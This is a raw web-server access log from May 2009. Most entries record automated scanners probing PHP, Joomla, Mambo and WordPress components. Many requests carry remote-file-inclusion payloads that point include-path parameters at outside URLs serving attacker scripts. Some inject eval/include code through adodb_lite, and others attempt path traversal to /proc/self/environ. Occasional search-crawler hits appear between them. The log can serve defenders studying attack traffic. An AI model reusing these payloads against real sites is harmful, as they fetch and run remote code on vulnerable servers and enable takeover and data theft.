121.101.159.29 - - [13/May/2009:07:06:04 -0500] "GET /logs/access_log.1240531200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 386 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
201.234.41.5 - - [13/May/2009:07:07:53 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:07:07:53 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
66.249.67.180 - - [13/May/2009:07:09:35 -0500] "GET /logs/access_log.1150502400 HTTP/1.1" 200 1702 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.86.82.88 - - [13/May/2009:07:11:09 -0500] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://10thplanet.com/playlist/scan/id???? HTTP/1.1" 404 318 "-""libwww-perl/5.825"
80.86.82.88 - - [13/May/2009:07:11:09 -0500] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://10thplanet.com/playlist/scan/id???? HTTP/1.1" 404 313 "-""libwww-perl/5.825"
74.52.107.130 - - [13/May/2009:07:11:47 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.814"
74.52.107.130 - - [13/May/2009:07:11:48 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
77.221.130.19 - - [13/May/2009:07:12:36 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:12:36 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
210.240.12.4 - - [13/May/2009:07:12:44 -0500] "GET /logs/citywriter/head.php?path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 307 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.240.12.4 - - [13/May/2009:07:12:44 -0500] "GET /citywriter/head.php?path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 302 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.240.12.4 - - [13/May/2009:07:12:44 -0500] "GET /logs/access_log.1237939200/citywriter/head.php?path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 329 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.19 - - [13/May/2009:07:14:49 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 200 189195 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:14:49 -0500] "GET //?path%5Bdocroot%5D=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:07:14:50 -0500] "GET /logs/access_log.1198972800 HTTP/1.1" 200 2352 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.19 - - [13/May/2009:07:14:54 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 189195 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:14:54 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 200 189195 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:14:55 -0500] "GET //?path%5Bdocroot%5D=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:14:55 -0500] "GET //?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
217.147.29.190 - - [13/May/2009:07:15:41 -0500] "GET /show.php?path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 291 "-""Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:41 -0500] "GET /logs/show.php?path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:41 -0500] "GET /logs/access_log.1238112000/show.php?path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.54.46.2 - - [13/May/2009:07:15:48 -0500] "GET /logs//components/errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
74.54.46.2 - - [13/May/2009:07:15:48 -0500] "GET /logs//components/errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
74.54.46.2 - - [13/May/2009:07:15:48 -0500] "GET //components/errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
74.54.46.2 - - [13/May/2009:07:15:48 -0500] "GET //components/errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
74.52.107.130 - - [13/May/2009:07:17:14 -0500] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.814"
74.52.107.130 - - [13/May/2009:07:17:14 -0500] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.814"
210.240.12.4 - - [13/May/2009:07:17:57 -0500] "GET /logs/access_log.1240531200/citywriter/head.php?path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 329 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
123.125.64.38 - - [13/May/2009:07:19:51 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.58.119.65 - - [13/May/2009:07:20:04 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.814"
200.58.119.65 - - [13/May/2009:07:20:04 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
66.249.67.180 - - [13/May/2009:07:20:06 -0500] "GET /logs/access_log.1169078400 HTTP/1.1" 200 34343 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.58.119.65 - - [13/May/2009:07:20:10 -0500] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.814"
200.58.119.65 - - [13/May/2009:07:20:10 -0500] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.814"
67.204.0.222 - - [13/May/2009:07:20:49 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:20:49 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
122.116.178.20 - - [13/May/2009:07:21:26 -0500] "GET //bbs/zero_vote/login.php?dir=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:07:21:26 -0500] "GET /logs//bbs/zero_vote/login.php?dir=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:07:21:42 -0500] "GET /logs/access_log.1238284800//bbs/zero_vote/login.php?dir=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:07:21:42 -0500] "GET /logs/access_log.1238457600//bbs/zero_vote/login.php?dir=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.221.130.19 - - [13/May/2009:07:21:49 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:21:50 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
218.150.79.146 - - [13/May/2009:07:22:29 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:07:22:29 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:07:22:29 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:07:22:39 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
67.204.0.222 - - [13/May/2009:07:22:43 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:22:45 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
218.150.79.146 - - [13/May/2009:07:23:14 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:07:23:22 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:07:23:22 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:07:23:22 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
67.204.0.222 - - [13/May/2009:07:23:56 -0500] "GET /logs/home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:23:56 -0500] "GET /home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:07:25:23 -0500] "GET /logs/access_log.1155254400 HTTP/1.1" 200 648 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:07:30:43 -0500] "GET /logs/access_log.1193184000 HTTP/1.1" 200 3724 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.97.132.101 - - [13/May/2009:07:35:04 -0500] "GET /logs/access_log.1238112000/?page=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 298 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:07:35:05 -0500] "GET /?page=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 200 3233 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:07:35:06 -0500] "GET /logs/?page=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 200 188856 "-""libwww-perl/5.53"
66.249.67.180 - - [13/May/2009:07:35:58 -0500] "GET /logs/access_log.1152230400 HTTP/1.1" 200 991 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.204.0.222 - - [13/May/2009:07:40:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 189195 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:40:24 -0500] "GET //?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:07:41:15 -0500] "GET /logs/access_log.1208044800 HTTP/1.1" 200 1540 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.19 - - [13/May/2009:07:42:32 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:42:33 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:07:43:00 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:43:01 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:43:10 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:43:11 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:45:50 -0500] "GET /logs/home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:45:51 -0500] "GET /home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
77.221.130.19 - - [13/May/2009:07:46:17 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:46:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:07:46:36 -0500] "GET /logs/access_log.1161820800 HTTP/1.1" 200 758 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.19 - - [13/May/2009:07:47:35 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:47:35 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
74.55.156.2 - - [13/May/2009:07:48:49 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:07:48:49 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.820"
91.149.157.130 - - [13/May/2009:07:49:43 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
91.149.157.130 - - [13/May/2009:07:49:43 -0500] "GET //pollphp/db//booth.php?include_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
80.86.82.88 - - [13/May/2009:07:49:48 -0500] "GET /logs/MamboLogin.php?IP=http://10thplanet.com/playlist/scan/id???? HTTP/1.1" 404 302 "-""libwww-perl/5.825"
80.86.82.88 - - [13/May/2009:07:49:48 -0500] "GET /MamboLogin.php?IP=http://10thplanet.com/playlist/scan/id???? HTTP/1.1" 404 297 "-""libwww-perl/5.825"
77.221.130.19 - - [13/May/2009:07:49:50 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:49:50 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:50:01 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:50:01 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
148.243.72.112 - - [13/May/2009:07:50:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shakur.sanjosedelmar.com/licencia.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
148.243.72.112 - - [13/May/2009:07:50:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shakur.sanjosedelmar.com/licencia.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
148.243.72.112 - - [13/May/2009:07:50:58 -0500] "GET /logs/access_log.1239580800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shakur.sanjosedelmar.com/licencia.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
77.221.130.19 - - [13/May/2009:07:51:40 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:51:40 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:07:51:51 -0500] "GET /logs/access_log.1167436800 HTTP/1.1" 200 1861 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.188.218.41 - - [13/May/2009:07:53:55 -0500] "GET /logs//_head.php?_zb_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
210.188.218.41 - - [13/May/2009:07:53:55 -0500] "GET //_head.php?_zb_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
210.188.218.41 - - [13/May/2009:07:53:56 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
210.188.218.41 - - [13/May/2009:07:53:56 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
210.188.218.41 - - [13/May/2009:07:53:56 -0500] "GET //_head.php?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""XXXXXX"
210.188.218.41 - - [13/May/2009:07:53:56 -0500] "GET /logs//_head.php?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""XXXXXX"
210.188.218.41 - - [13/May/2009:07:53:57 -0500] "GET //_head.php?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""XXXXXX"
210.188.218.41 - - [13/May/2009:07:53:57 -0500] "GET /logs//_head.php?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""XXXXXX"
66.7.201.86 - - [13/May/2009:07:54:43 -0500] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.826"
66.7.201.86 - - [13/May/2009:07:54:43 -0500] "GET //com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt%0D?? HTTP/1.1" 404 319 "-""libwww-perl/5.826"
122.153.212.195 - - [13/May/2009:07:56:07 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:07:56:13 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:07:56:17 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.59.11.66 - - [13/May/2009:07:56:27 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.59.11.66 - - [13/May/2009:07:56:27 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.59.11.66 - - [13/May/2009:07:56:27 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.59.11.66 - - [13/May/2009:07:56:40 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:07:57:07 -0500] "GET /logs/access_log.1169164800 HTTP/1.1" 200 24564 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [13/May/2009:08:02:21 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:08:02:22 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
66.249.67.180 - - [13/May/2009:08:02:30 -0500] "GET /logs/access_log.1207526400 HTTP/1.1" 200 3344 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.231.24.38 - - [13/May/2009:08:05:50 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:08:05:50 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
